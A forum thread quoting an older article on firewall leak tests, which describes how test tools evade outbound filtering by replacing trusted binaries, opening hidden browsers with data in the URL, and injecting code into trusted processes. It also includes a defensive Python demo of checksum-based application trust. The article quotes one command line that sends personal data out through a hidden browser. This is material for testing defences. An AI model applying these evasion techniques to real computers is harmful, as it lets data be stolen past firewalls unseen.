Thread: Malicious Code That can Slip Past it all

  1. #1
    Big Booger (Super Moderator)
    Join Date: Apr 2002
    Location: JAPAN
    Posts: 10,941

    Malicious Code That can Slip Past it all

    http://www.pcflank.com/art41b.htm

    That article is dated August 2003, so it is rather old, but the content is nonetheless important:

    Leak test descriptions

    LeakTest by Steve Gibson
    http://www.grc.com/lt/leaktest.htm

    The grandpa of all leak tests created by the owner of GRC.com, Steve Gibson.

    While the majority of firewalls rely on application trust levels set by the user, it was shown that just replacing a trusted application with a malicious agent of the same name would often make a firewall allow the outbound traffic from the malicious program with all the privileges granted to the real app.

    Recent versions of most firewalls have this bug fixed by performing checksums on the trusted applications and warning the user if a dissimilar copy of the application is identified.

    TooLeaky by Bob Sundling
    http://www.tooleaky.zensoft.com

    This is another veteran test that uses a more advanced technique than Gibson’s test.

    It uses the system's web browser to transmit information without the knowledge of the user. The tool opens your default web browser with the following command line:

    iexplore.exe http://grc.com/lt/leaktest.htm?PersonalInfoGoesHere

    The browser window is hidden so the user doesn’t notice it. If the web browser is allowed to access port 80 by the firewall then any personal data can be transmitted to the remote address (GRC.com in this case). This info can be anything including the user's passwords, credit card information and much more.

    FireHole by Robin Keir
    http://www.keir.net/firehole.html

    Firehole—created by Robin Keir, the lead network security programmer of Foundstone—uses the default web browser to transmit data to a remote host, but its technique is much more sophisticated than TooLeaky’s.

    "FireHole" installs a DLL file (having an intercept function) on the user's computer. This DLL gets loaded up with any subsequent program and is treated as being in the same process space as the other program. So, "FireHole" uses the process space of the system's default browser and as a result is almost certainly trusted by the firewall.

    Yalta by Soft4Ever
    http://www.soft4ever.com/security_test/En/index.htm

    Yalta was created by the developers of Look'n'Stop firewall. Yalta acts as a Trojan trying to send a message to a remote address, bypassing all firewall filters.

    Yalta is two tests: the Classical Leak Test and the Enhanced Leak Test. We tested all firewalls with Yalta's Classical Leak Test.

    pcAudit by Internet Security Alliance
    http://www.pcinternetpatrol.com/

    This is a relatively new tool that uses a DLL injection technique to hide its presence from a firewall. pcAudit injects its code into a DLL of a trusted application and then attempts to call back to a remote computer. Some firewalls allow all communications from trusted applications and do not spot a malicious DLL.

    Atelier Web Firewall Tester (AWFT) 3.0
    http://www.atelierweb.com/awft/

    AWFT consists of six tests, each giving points to a firewall if it passes. The maximum number of points you can get is 10.

    AWFT tests are similar to the other leak tests; “DLL injection”, “address space injection”, “hidden browser window” are all used.

    Thermite by Oliver Lavery
    Download link: http://perso.wanadoo.fr/jugesoftware...s/thermite.exe
    Author email: oliverlavery@hotmail.com

    Thermite is tiny, but a very tricky tool that does not use DLL injection. Instead, it injects itself into the address space of a trusted process (application). Most firewalls cannot detect it as this technique makes malicious code almost totally invisible to the firewall! Being undetected Thermite can send out any info from your PC.

    CopyCat
    Download link: http://mc.webm.ru/copycat.exe

    CopyCat, like Thermite, also injects itself into the address space of a trusted process. However, CopyCat enables the user to select the application that CopyCat is to be injected into.

    Seems like there are quite a few tricks to get at your system data. When compromised using these tricks, your system is an open book.
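The LeakTest section above describes the fix most firewalls adopted: instead of trusting an application by its name or path alone, record a checksum of the trusted binary and refuse to reuse the rule when the file at that path changes. The following is an added example, written for this page and not code from the article, the forum poster or any of the tools named; it models both rule tables side by side on constructed files in a temporary directory (the file names, contents and class names are all assumptions for the demo) so the difference in verdicts can be seen directly.

```python
"""Path-keyed trust vs checksum-keyed trust for an application firewall rule table.

Added example (not from the article or the forum post): models the fix the
article describes, a firewall that fingerprints each trusted executable and
refuses to reuse the rule when the file at that path no longer matches.
All file names and contents below are constructed for the demonstration.
"""
import hashlib
import os
import tempfile
from dataclasses import dataclass


def sha256_of(path: str) -> str:
    """Return the hex SHA-256 digest of a file, read in 64 KiB chunks."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


@dataclass
class Verdict:
    allowed: bool
    reason: str


class PathTrustStore:
    """The weak model: a rule is keyed by path only, which a same-name replacement defeats."""

    def __init__(self) -> None:
        self._rules: set[str] = set()

    def trust(self, path: str) -> None:
        self._rules.add(os.path.abspath(path))

    def check(self, path: str) -> Verdict:
        if os.path.abspath(path) in self._rules:
            return Verdict(True, "path is on the allow-list")
        return Verdict(False, "no rule for this path")


class ChecksumTrustStore:
    """The fixed model: a rule records the digest of the binary it was created for."""

    def __init__(self) -> None:
        self._rules: dict[str, str] = {}

    def trust(self, path: str) -> None:
        self._rules[os.path.abspath(path)] = sha256_of(path)

    def check(self, path: str) -> Verdict:
        key = os.path.abspath(path)
        expected = self._rules.get(key)
        if expected is None:
            return Verdict(False, "no rule for this path")
        actual = sha256_of(path)
        if actual != expected:
            # The file at a trusted path was replaced or modified: a real firewall
            # would re-prompt the user here instead of silently reusing the rule.
            return Verdict(False, "checksum mismatch: binary at trusted path changed")
        return Verdict(True, "path and checksum match the rule")


def simulate_replacement() -> dict[str, Verdict]:
    """Run the same-name replacement scenario against both stores and return all four verdicts."""
    with tempfile.TemporaryDirectory() as tmp:
        app = os.path.join(tmp, "trusted_app.exe")  # constructed stand-in for a real program
        with open(app, "wb") as f:
            f.write(b"GENUINE APPLICATION BYTES v1")

        by_path, by_hash = PathTrustStore(), ChecksumTrustStore()
        by_path.trust(app)  # the user clicks "allow" once for the genuine program
        by_hash.trust(app)
        results = {
            "path_before": by_path.check(app),
            "hash_before": by_hash.check(app),
        }

        # Same file name, different contents: the "agent of the same name" from the article.
        with open(app, "wb") as f:
            f.write(b"DIFFERENT PROGRAM CARRYING THE SAME NAME")

        results["path_after"] = by_path.check(app)
        results["hash_after"] = by_hash.check(app)
        return results


if __name__ == "__main__":
    for name, verdict in simulate_replacement().items():
        print(f"{name:12s} allowed={str(verdict.allowed):5s} {verdict.reason}")
```

Before the swap both stores allow the program; after it, the path-keyed store still allows it while the checksum-keyed store denies with a mismatch reason. The checksum is computed at check time rather than cached, which is what makes the second verdict possible; the cost is one file read per decision, which real firewalls amortise by caching the digest against the file's modification time.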

  2. #2
    Titanium Member
    Join Date: Jul 2002
    Location: blk helo target, WA
    Posts: 3,536
